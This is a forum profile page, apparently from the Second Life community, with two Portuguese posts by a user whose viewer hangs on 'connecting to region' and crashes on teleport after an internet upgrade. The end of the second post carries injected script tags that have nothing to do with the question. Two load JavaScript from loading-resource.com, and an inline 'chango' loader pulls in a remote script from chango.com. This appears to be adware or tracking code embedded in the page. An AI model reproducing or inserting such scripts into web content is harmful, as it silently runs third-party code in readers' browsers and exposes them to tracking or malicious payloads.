Jump to content

Pcsiqueiraa

Resident
  • Content Count

    2
  • Joined

  • Last visited

Posts posted by Pcsiqueiraa


  1. Eu entro no meu Second Life e ele fica Conectando á região e nao entra

    as vezes ele entra só que só funciona numa land e quando eu quero me teleportar pra outra land

    a barrinha fica carregando e demora muito e quando para o SL cai!

    Minha net era de 2 megas e agora eu tenho a de 10 megas da net.

    Quanto eu tinha a de 2 megas nunca aconteçeu isso, mais depois que eu comprei a de 10 megas da net começou a dar isso, e não para.

    Eu tentei outro avatar mais da a mesma coisa.

    Oque eu faço pra parar com isso me Ajudem porfavor  :(


  2. Eu logo no meu avatar normalmente mais fica la e não sai de conectando a regiao!!

    Eu comprei uma nova net semana passada

    antes era de 2 megas agora é de 10 eu não sei se é por isso mais Não entra!

     

    <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script id="__changoScript" type="text/javascript">// var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src=( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})(); // </script>
×
×
  • Create New...